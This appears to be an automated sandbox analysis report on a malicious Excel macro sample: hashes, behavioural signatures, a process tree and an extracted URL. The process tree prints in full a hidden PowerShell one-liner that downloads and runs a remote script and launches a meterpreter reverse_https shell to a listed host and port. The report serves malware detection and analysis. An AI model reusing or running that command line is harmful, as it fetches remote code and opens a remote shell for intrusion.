Analysis
-
max time kernel
24s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
09-07-2024 22:14
Behavioral task
behavioral1
Sample
832dc1da08ddc7f542938b77b768cd40c8b7eaf3a430c6058d8af80400515284.xls
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
832dc1da08ddc7f542938b77b768cd40c8b7eaf3a430c6058d8af80400515284.xls
Resource
win10v2004-20240709-en
General
-
Target
832dc1da08ddc7f542938b77b768cd40c8b7eaf3a430c6058d8af80400515284.xls
-
Size
44KB
-
MD5
1e9ed7e79c0f48996fedb74189895ae6
-
SHA1
e0f104e40847774f3ca32fff30bdfc4548691b02
-
SHA256
832dc1da08ddc7f542938b77b768cd40c8b7eaf3a430c6058d8af80400515284
-
SHA512
2c648e9ef3e931ea9a0e182b75cc0d2db4d2ee478082ade6654f0d1e8b3cfc516c515031e260283c830b08f39ed1f946d1c7f468be18be99441cfbff8e3fc5e4
-
SSDEEP
768:Ytvo+lzZk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJxSp5kuFlmQQpIvH9acc9acyL:IPk3hbdlylKsgqopeJBWhZFGkE+cL2N5
Malware Config
Extracted
https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2840 2476 powershell.exe 30 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2752 2676 wscript.exe 29 -
Blocklisted process makes network request 4 IoCs
flow pid Process 6 2840 powershell.exe 7 2840 powershell.exe 8 2608 powershell.exe 9 2608 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2840 powershell.exe 2608 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 5 raw.githubusercontent.com 6 raw.githubusercontent.com 7 raw.githubusercontent.com 8 raw.githubusercontent.com 9 raw.githubusercontent.com -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2676 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2840 powershell.exe 2608 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2840 powershell.exe Token: SeDebugPrivilege 2608 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2676 EXCEL.EXE 2676 EXCEL.EXE 2676 EXCEL.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2676 wrote to memory of 2752 2676 EXCEL.EXE 33 PID 2676 wrote to memory of 2752 2676 EXCEL.EXE 33 PID 2676 wrote to memory of 2752 2676 EXCEL.EXE 33 PID 2676 wrote to memory of 2752 2676 EXCEL.EXE 33 PID 2752 wrote to memory of 2608 2752 wscript.exe 34 PID 2752 wrote to memory of 2608 2752 wscript.exe 34 PID 2752 wrote to memory of 2608 2752 wscript.exe 34 PID 2752 wrote to memory of 2608 2752 wscript.exe 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\832dc1da08ddc7f542938b77b768cd40c8b7eaf3a430c6058d8af80400515284.xls1⤵
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\SysWOW64\wscript.exewscript C:\Users\Public\config.vbs2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q44SNVSCLWUI4EOJ1RSW.temp
Filesize7KB
MD50b4b37fb1d31247d0b26f5dc9a8e33f2
SHA1e60297e0a3673932174e048753978cdaa0c6398e
SHA2565ef3a3df51d3fa2286e375742e73bfcb9154efd96eeae596669b939c8626b60e
SHA5125e1d10a26e1f0b6acdca3ca9f0f85ed607108803fd889f12dbca9aebdb8355479c9728e0787310d8690aad3964aaf967d331be98c69f7dc87fbf5d4f94514dde
-
Filesize
461B
MD5ce52ab154163c511f0efa6a61e22ab64
SHA19f12cc215e15802eddcb02cb5370ef16b21fa3a6
SHA256df342167afd4f1758c02b8793b27a2f9e35f074ea20aa1aa75c69d48d88fcd17
SHA512cf50d9b51fcb4f3150aeca158a7a2249b1f5806d0e9ffc2b479ef936a7d85fdaaf302ce5cb3263e03b3c7805d38ca734f167ff757e6b6cdf89343f13a2bf0f78